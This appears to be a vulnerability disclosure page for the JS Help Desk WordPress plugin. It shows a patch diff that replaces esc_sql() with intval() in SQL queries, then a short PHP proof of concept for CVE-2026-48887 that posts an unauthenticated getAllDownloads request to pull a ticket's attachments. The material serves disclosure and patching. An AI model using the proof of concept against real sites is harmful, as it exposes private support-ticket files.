         $jsst_email = jssupportticket::$_db->get_var($jsst_query);
         $jsst_result->receveremail = $jsst_email;
         return $jsst_result;
@@ -1903,7 +1903,7 @@
             return false;
         $jsst_query = "SELECT staff.email
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff
-                    WHERE staff.id = " . esc_sql($jsst_id);
+                    WHERE staff.id = " . intval($jsst_id);
         $jsst_emailaddress = jssupportticket::$_db->get_var($jsst_query);
         return $jsst_emailaddress;
     }
@@ -1913,7 +1913,7 @@
             return false;
         $jsst_query = "SELECT staff.uid
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff
-                    WHERE staff.id = " . esc_sql($jsst_id);
+                    WHERE staff.id = " . intval($jsst_id);
         $jsst_emailaddress = jssupportticket::$_db->get_var($jsst_query);
         return $jsst_emailaddress;
     }
@@ -1921,7 +1921,7 @@
     private function getLatestReplyByTicketId($jsst_id) {
         if (!is_numeric($jsst_id))
             return false;
-        $jsst_query = "SELECT reply.message FROM `" . jssupportticket::$_db->prefix . "js_ticket_replies` AS reply WHERE reply.ticketid = " . esc_sql($jsst_id) . " ORDER BY reply.created DESC LIMIT 1";
+        $jsst_query = "SELECT reply.message FROM `" . jssupportticket::$_db->prefix . "js_ticket_replies` AS reply WHERE reply.ticketid = " . intval($jsst_id) . " ORDER BY reply.created DESC LIMIT 1";
         $jsst_message = jssupportticket::$_db->get_var($jsst_query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -2013,7 +2013,7 @@
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` AS ticket
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS department ON department.id = ticket.departmentid
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_email` AS email ON email.id = department.emailid
-                        WHERE ticket.id = " . esc_sql($jsst_id);
+                        WHERE ticket.id = " . intval($jsst_id);
             $jsst_email = jssupportticket::$_db->get_row($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -2030,7 +2030,7 @@
     private function getDefaultSenderEmailAndName() {
         $jsst_emailid = jssupportticket::$_config['default_alert_email'];
         if(!is_numeric($jsst_emailid)) return false;
-        $jsst_query = "SELECT email,name FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE id = " . esc_sql($jsst_emailid);
+        $jsst_query = "SELECT email,name FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE id = " . intval($jsst_emailid);
         $jsst_email = jssupportticket::$_db->get_row($jsst_query);
         return $jsst_email;
     }
@@ -2040,7 +2040,7 @@

         // If multiformid is provided
         if (!empty($jsst_multiformid)) {
-            $jsst_query .= " AND multiformid = " . esc_sql($jsst_multiformid);
+            $jsst_query .= " AND multiformid = " . intval($jsst_multiformid);
             $jsst_template = jssupportticket::$_db->get_row($jsst_query);

             // If no form-specific template is found, fallback to default
@@ -2075,7 +2075,7 @@
                     . " LEFT JOIN `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS department ON department.id = ticket.departmentid "
                     . jssupportticket::$_addon_query['join']
                     . " LEFT JOIN `" . jssupportticket::$_db->prefix . "js_ticket_priorities` AS priority ON priority.id = ticket.priorityid "
-                    . " WHERE ticket.id = " . esc_sql($jsst_id);
+                    . " WHERE ticket.id = " . intval($jsst_id);
                 do_action('jsst_reset_aadon_query');
             break;
             default:
--- a/js-support-ticket/modules/emailtemplate/model.php
+++ b/js-support-ticket/modules/emailtemplate/model.php
@@ -70,7 +70,7 @@
             $jsst_query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . esc_sql($jsst_tempatefor) . "'";
         }
         if (!empty($jsst_formid)) {
-            $jsst_query .= " AND multiformid = " . esc_sql($jsst_formid);
+            $jsst_query .= " AND multiformid = " . intval($jsst_formid);
         } else {
             $jsst_query .= " AND (multiformid IS NULL OR multiformid = '')";
         }
--- a/js-support-ticket/modules/fieldordering/model.php
+++ b/js-support-ticket/modules/fieldordering/model.php
@@ -26,7 +26,7 @@

         // Data
 //        $jsst_query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE published = 1 AND fieldfor = 1 ORDER BY ordering LIMIT ".JSSTpagination::getOffset().", ".JSSTpagination::getLimit();
-        $jsst_query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE fieldfor = ".esc_sql($jsst_fieldfor);
+        $jsst_query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE fieldfor = ".intval($jsst_fieldfor);
         $jsst_query .= $jsst_inquery." ORDER BY ordering ";

         jssupportticket::$jsst_data[0] = jssupportticket::$_db->get_results($jsst_query);
@@ -40,14 +40,14 @@
         if (!is_numeric($jsst_id))
             return false;
         if ($jsst_status == 'publish') {
-            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 1 WHERE id = " . esc_sql($jsst_id) . " AND cannotunpublish = 0";
+            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 1 WHERE id = " . intval($jsst_id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
             }
             JSSTmessage::setMessage(esc_html(__('Field mark as published', 'js-support-ticket')),'updated');
         } elseif ($jsst_status == 'unpublish') {
-            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 0 WHERE id = " . esc_sql($jsst_id) . " AND cannotunpublish = 0";
+            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 0 WHERE id = " . intval($jsst_id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -61,12 +61,12 @@
         if (!is_numeric($jsst_id))
             return false;
         if ($jsst_status == 'publish') {
-            $jsst_query = "SELECT adminonly FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE id = " . esc_sql($jsst_id);
+            $jsst_query = "SELECT adminonly FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE id = " . intval($jsst_id);
             $jsst_adminonly = jssupportticket::$_db->get_var($jsst_query);
             if(!empty($jsst_adminonly)){
                 JSSTmessage::setMessage(esc_html(__('Field cannot be mark as published', 'js-support-ticket')),'error');
             }else{
-                $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 1 WHERE id = " . esc_sql($jsst_id) . " AND cannotunpublish = 0";
+                $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 1 WHERE id = " . intval($jsst_id) . " AND cannotunpublish = 0";
                 jssupportticket::$_db->query($jsst_query);
                 if (jssupportticket::$_db->last_error != null) {
                     JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -74,7 +74,7 @@
                 JSSTmessage::setMessage(esc_html(__('Field mark as published', 'js-support-ticket')),'updated');
             }
         } elseif ($jsst_status == 'unpublish') {
-            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 0 WHERE id = " . esc_sql($jsst_id) . " AND cannotunpublish = 0";
+            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 0 WHERE id = " . intval($jsst_id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -88,23 +88,23 @@
         if (!is_numeric($jsst_id))
             return false;

-        // $jsst_query = "SELECT field FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE id =".esc_sql($jsst_id);
+        // $jsst_query = "SELECT field FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE id =".intval($jsst_id);
         // $jsst_child = jssupportticket::$_db->get_var($jsst_query);
-        // $jsst_query = "SELECT count(id) FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE visible_field = '".esc_sql($jsst_child)."'";
+        // $jsst_query = "SELECT count(id) FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE visible_field = '".intval($jsst_child)."'";
         // $jsst_count = jssupportticket::$_db->get_var($jsst_query);
         // if ($jsst_count > 0) {
         //     JSSTmessage::setMessage(esc_html(__('Field cannot mark as required', 'js-support-ticket')), 'error');
         //     return;
         // }
         if ($jsst_status == 'required') {
-            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 1 WHERE id = " . esc_sql($jsst_id) . " AND cannotunpublish = 0";
+            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 1 WHERE id = " . intval($jsst_id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
             }
             JSSTmessage::setMessage(esc_html(__('Field mark as required', 'js-support-ticket')),'updated');
         } elseif ($jsst_status == 'unrequired') {
-            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 0 WHERE id = " . esc_sql($jsst_id) . " AND cannotunpublish = 0";
+            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET required = 0 WHERE id = " . intval($jsst_id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -120,16 +120,16 @@
         if ($jsst_action == 'down') {
             $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f1, `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f2
                         SET f1.ordering = f1.ordering - 1 WHERE f1.ordering = f2.ordering + 1 AND f1.fieldfor = f2.fieldfor
-                        AND f2.id = " . esc_sql($jsst_id);
+                        AND f2.id = " . intval($jsst_id);
             jssupportticket::$_db->query($jsst_query);
-            $jsst_query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering + 1 WHERE id = " . esc_sql($jsst_id);
+            $jsst_query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering + 1 WHERE id = " . intval($jsst_id);
             jssupportticket::$_db->query($jsst_query);
             JSSTmessage::setMessage(esc_html(__('Field ordering down', 'js-support-ticket')),'updated');
         } elseif ($jsst_action == 'up') {
             $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f1, `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` AS f2 SET f1.ordering = f1.ordering + 1
-                        WHERE f1.ordering = f2.ordering - 1 AND f1.fieldfor = f2.fieldfor AND f2.id = " . esc_sql($jsst_id);
+                        WHERE f1.ordering = f2.ordering - 1 AND f1.fieldfor = f2.fieldfor AND f2.id = " . intval($jsst_id);
             jssupportticket::$_db->query($jsst_query);
-            $jsst_query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering - 1 WHERE id = " . esc_sql($jsst_id);
+            $jsst_query = " UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ordering = ordering - 1 WHERE id = " . intval($jsst_id);
             jssupportticket::$_db->query($jsst_query);
             JSSTmessage::setMessage(esc_html(__('Field ordering up', 'js-support-ticket')),'updated');
         }
@@ -160,7 +160,7 @@
                 $jsst_adminonly = ' AND adminonly != 1 ';
             }
         }
-        $jsst_query = "SELECT  * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE ".$jsst_published." AND fieldfor =  " . esc_sql($jsst_fieldfor);
+        $jsst_query = "SELECT  * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE ".$jsst_published." AND fieldfor =  " . intval($jsst_fieldfor);
         if ($jsst_fieldfor == 1) {
             $jsst_query .= " AND multiformid =  " . intval($jsst_formid);
         }
@@ -195,7 +195,7 @@
         if ($jsst_data['isuserfield'] == 1) {
             // value to add as field ordering
             if ($jsst_data['id'] == '') { // only for new
-                $jsst_query = "SELECT max(ordering) FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor=".esc_sql($jsst_data['fieldfor']);
+                $jsst_query = "SELECT max(ordering) FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor=".intval($jsst_data['fieldfor']);
                 $jsst_var = jssupportticket::$_db->get_var($jsst_query);
                 $jsst_data['ordering'] = $jsst_var + 1;
                 if(isset($jsst_data['userfieldtype']) && ($jsst_data['userfieldtype'] == 'file' || $jsst_data['userfieldtype'] == 'termsandconditions' ) ){
@@ -271,7 +271,7 @@
                 // new start

                 if (!empty($jsst_data['id'])) {
-                    $jsst_query = "SELECT id, visible_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE visible_field LIKE '%" . esc_sql($jsst_fieldname) . "%' AND multiformid = ".esc_sql($jsst_data['multiformid']);
+                    $jsst_query = "SELECT id, visible_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE visible_field LIKE '%" . esc_sql($jsst_fieldname) . "%' AND multiformid = ".intval($jsst_data['multiformid']);
                     $jsst_query_results = jssupportticket::$_db->get_results($jsst_query);

                     if (!empty($jsst_query_results)) {
@@ -279,7 +279,7 @@
                             $jsst_query_fieldname = $jsst_query_result->visible_field;
                             $jsst_query_fieldname = jssupportticketphplib::JSST_str_replace(',' . $jsst_fieldname, '', $jsst_query_fieldname);
                             $jsst_query_fieldname = jssupportticketphplib::JSST_str_replace($jsst_fieldname, '', $jsst_query_fieldname);
-                            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET visible_field = '" . esc_sql($jsst_query_fieldname) . "' WHERE id = " . esc_sql($jsst_query_result->id) . " AND multiformid = ".esc_sql($jsst_data['multiformid']);
+                            $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET visible_field = '" . esc_sql($jsst_query_fieldname) . "' WHERE id = " . esc_sql($jsst_query_result->id) . " AND multiformid = ".intval($jsst_data['multiformid']);
                             jssupportticket::$_db->query($jsst_query);
                         }
                     }
@@ -325,7 +325,7 @@
                         }

                         // --- your database update code ---
-                        $jsst_query = "SELECT visible_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE field = '" . esc_sql($jsst_visibleParents[$jsst_index]) . "' AND multiformid = ".esc_sql($jsst_data['multiformid']);
+                        $jsst_query = "SELECT visible_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE field = '" . esc_sql($jsst_visibleParents[$jsst_index]) . "' AND multiformid = ".intval($jsst_data['multiformid']);
                         $jsst_old_fieldname = jssupportticket::$_db->get_var($jsst_query);
                         $jsst_new_fieldname = $jsst_fieldname;

@@ -338,7 +338,7 @@
                             $jsst_new_fieldname = $jsst_old_fieldname . ',' . $jsst_new_fieldname;
                         }

-                        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET visible_field = '" . esc_sql($jsst_new_fieldname) . "' WHERE field = '" . esc_sql($jsst_visibleParents[$jsst_index]) . "' AND multiformid = ".esc_sql($jsst_data['multiformid']);
+                        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET visible_field = '" . esc_sql($jsst_new_fieldname) . "' WHERE field = '" . esc_sql($jsst_visibleParents[$jsst_index]) . "' AND multiformid = ".intval($jsst_data['multiformid']);
                         jssupportticket::$_db->query($jsst_query);

                         if (jssupportticket::$_db->last_error != null) {
@@ -359,7 +359,7 @@
                 if ($jsst_data['fieldfor'] != 3) {
                     $jsst_data['visibleparams'] = '';
                     // If editing old field
-                    $jsst_query = "SELECT id, visible_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE visible_field LIKE '%" . esc_sql($jsst_fieldname) . "%' AND multiformid = ".esc_sql($jsst_data['multiformid']);
+                    $jsst_query = "SELECT id, visible_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE visible_field LIKE '%" . esc_sql($jsst_fieldname) . "%' AND multiformid = ".intval($jsst_data['multiformid']);
                     $jsst_query_results = jssupportticket::$_db->get_results($jsst_query);
                     if (!empty($jsst_query_results)) {
                         foreach ($jsst_query_results as $jsst_query_result) {
@@ -466,7 +466,7 @@

                 /* get parent saved data */
                 $jsst_query = "SELECT * FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering where
-                id = '". esc_sql($jsst_data['id'])."'";
+                id = '". intval($jsst_data['id'])."'";
                 $jsst_parent = jssupportticket::$_db->get_row($jsst_query);
                 /* get parent saved data */

@@ -494,11 +494,11 @@
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['published']) && $jsst_data['published'] != null){
-            $jsst_inquery .= $jsst_clasue." published = ". esc_sql($jsst_data['published']);
+            $jsst_inquery .= $jsst_clasue." published = ". intval($jsst_data['published']);
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['isvisitorpublished']) && $jsst_data['isvisitorpublished'] != null){
-            $jsst_inquery .= $jsst_clasue." isvisitorpublished = ". esc_sql($jsst_data['isvisitorpublished']);
+            $jsst_inquery .= $jsst_clasue." isvisitorpublished = ". intval($jsst_data['isvisitorpublished']);
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['placeholder']) && $jsst_data['placeholder'] != null){
@@ -510,27 +510,27 @@
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['required']) && $jsst_data['required'] != null){
-            $jsst_inquery .= $jsst_clasue." required = ". esc_sql($jsst_data['required']);
+            $jsst_inquery .= $jsst_clasue." required = ". intval($jsst_data['required']);
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['search_user']) && $jsst_data['search_user'] != null){
-            $jsst_inquery .= $jsst_clasue." search_user = ". esc_sql($jsst_data['search_user']);
+            $jsst_inquery .= $jsst_clasue." search_user = ". intval($jsst_data['search_user']);
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['search_admin']) && $jsst_data['search_admin'] != null){
-            $jsst_inquery .= $jsst_clasue." search_admin = ". esc_sql($jsst_data['search_admin']);
+            $jsst_inquery .= $jsst_clasue." search_admin = ". intval($jsst_data['search_admin']);
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['search_visitor']) && $jsst_data['search_visitor'] != null){
-            $jsst_inquery .= $jsst_clasue." search_visitor = ". esc_sql($jsst_data['search_visitor']);
+            $jsst_inquery .= $jsst_clasue." search_visitor = ". intval($jsst_data['search_visitor']);
             $jsst_clasue = ' , ';
         }
         if(isset($jsst_data['showonlisting']) && $jsst_data['showonlisting'] != null){
-            $jsst_inquery .= $jsst_clasue." showonlisting = ". esc_sql($jsst_data['showonlisting']);
+            $jsst_inquery .= $jsst_clasue." showonlisting = ". intval($jsst_data['showonlisting']);
             $jsst_clasue = ' , ';
         }

-        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ".$jsst_inquery." WHERE id = " . esc_sql($jsst_data['id']) ;
+        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET ".$jsst_inquery." WHERE id = " . intval($jsst_data['id']) ;
         jssupportticket::$_db->query($jsst_query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -545,7 +545,7 @@
         if(!is_numeric($jsst_parentfield)) return false;
         if(empty($jsst_field)) return false;

-        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET depandant_field = '" . esc_sql($jsst_field) . "' WHERE id = " . esc_sql($jsst_parentfield)." AND fieldfor = ".esc_sql($jsst_fieldfor);
+        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET depandant_field = '" . esc_sql($jsst_field) . "' WHERE id = " . intval($jsst_parentfield)." AND fieldfor = ".intval($jsst_fieldfor);
         jssupportticket::$_db->query($jsst_query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -577,7 +577,7 @@
         //$jsst_childNew = wp_json_encode( stripslashes_deep($jsst_childNew) );
         $jsst_childNew = wp_json_encode( $jsst_childNew  );
         $jsst_child->userfieldparams = $jsst_childNew;
-        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET userfieldparams = '" . esc_sql($jsst_childNew) . "' WHERE id = " . esc_sql($jsst_child->id);
+        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET userfieldparams = '" . esc_sql($jsst_childNew) . "' WHERE id = " . intval($jsst_child->id);
         jssupportticket::$_db->query($jsst_query);
         if (jssupportticket::$_db->last_error != null) {

@@ -597,14 +597,14 @@
         if(!is_numeric($jsst_fieldfor)) return false;
         $jsst_wherequery = '';
         if(isset($jsst_parentfield) && $jsst_parentfield !='' ){
-            $jsst_query = "SELECT id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".esc_sql($jsst_fieldfor)." AND (userfieldtype = 'radio' OR userfieldtype = 'combo'OR userfieldtype = 'depandant_field') AND depandant_field = '" . esc_sql($jsst_parentfield) . "' ";
+            $jsst_query = "SELECT id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".intval($jsst_fieldfor)." AND (userfieldtype = 'radio' OR userfieldtype = 'combo'OR userfieldtype = 'depandant_field') AND depandant_field = '" . esc_sql($jsst_parentfield) . "' ";
             $jsst_parent = jssupportticket::$_db->get_var($jsst_query);
-            $jsst_wherequery = ' OR id = '.esc_sql($jsst_parent);
+            $jsst_wherequery = ' OR id = '.intval($jsst_parent);
         }
-        $jsst_query = "SELECT fieldtitle AS text ,id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".esc_sql($jsst_fieldfor)." AND multiformid = ".intval($jsst_formid)." AND (userfieldtype = 'radio' OR userfieldtype = 'combo' OR userfieldtype = 'depandant_field') AND (depandant_field = '' ".esc_sql($jsst_wherequery)." ) ";
+        $jsst_query = "SELECT fieldtitle AS text ,id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".intval($jsst_fieldfor)." AND multiformid = ".intval($jsst_formid)." AND (userfieldtype = 'radio' OR userfieldtype = 'combo' OR userfieldtype = 'depandant_field') AND (depandant_field = '' ".esc_sql($jsst_wherequery)." ) ";
         $jsst_data = jssupportticket::$_db->get_results($jsst_query);
         if(isset($jsst_parentfield) && $jsst_parentfield !='' ){
-            $jsst_query = "SELECT id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".esc_sql($jsst_fieldfor)." AND (userfieldtype = 'radio' OR userfieldtype = 'combo'OR userfieldtype = 'depandant_field') AND depandant_field = '" . esc_sql($jsst_parentfield) . "' ";
+            $jsst_query = "SELECT id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".intval($jsst_fieldfor)." AND (userfieldtype = 'radio' OR userfieldtype = 'combo'OR userfieldtype = 'depandant_field') AND depandant_field = '" . esc_sql($jsst_parentfield) . "' ";
             $jsst_parent = jssupportticket::$_db->get_var($jsst_query);
         }
         $jsst_nonce = wp_create_nonce("get-section-to-fill-values-".$jsst_fieldfor);
@@ -619,15 +619,15 @@
         if(!is_numeric($jsst_fieldfor)) return false;
         $jsst_wherequery = '';
         if(isset($jsst_field) && $jsst_field !='' ){
-            $jsst_query = "SELECT id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".esc_sql($jsst_fieldfor)." AND (userfieldtype IN ( 'combo', 'text', 'checkbox', 'date', 'email', 'radio', 'multiple') ) AND visible_field = '" . esc_sql($jsst_field) . "' ";
+            $jsst_query = "SELECT id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".intval($jsst_fieldfor)." AND (userfieldtype IN ( 'combo', 'text', 'checkbox', 'date', 'email', 'radio', 'multiple') ) AND visible_field = '" . esc_sql($jsst_field) . "' ";
             $jsst_parent = jssupportticket::$_db->get_var($jsst_query);
             if ($jsst_parent) {
-                $jsst_wherequery = ' OR id = '.esc_sql($jsst_parent);
+                $jsst_wherequery = ' OR id = '.intval($jsst_parent);
             }
         }
         $jsst_wherequeryforedit = '';
         if(isset($jsst_cid) && $jsst_cid !='' ){
-            $jsst_wherequeryforedit = ' AND id != '.esc_sql($jsst_cid);
+            $jsst_wherequeryforedit = ' AND id != '.intval($jsst_cid);
         }

         // Base fields always included
@@ -646,14 +646,14 @@
         SELECT fieldtitle AS text, field AS id
             FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering
             WHERE (
-                fieldfor = " . esc_sql($jsst_fieldfor) . "
-                AND multiformid = '" . esc_sql($jss

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-48887 - JS Help Desk – AI-Powered Support & Ticketing System Missing Authorization

$target_url = 'http://example.com'; // Change this to the target WordPress site URL
$ticket_id = 1; // Change this to the target ticket ID

// Prepare the request to download attachments from the specified ticket
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'getAllDownloads',
    'downloadid' => $ticket_id
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

echo "Response for ticket ID $ticket_id:n";
echo $response;

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School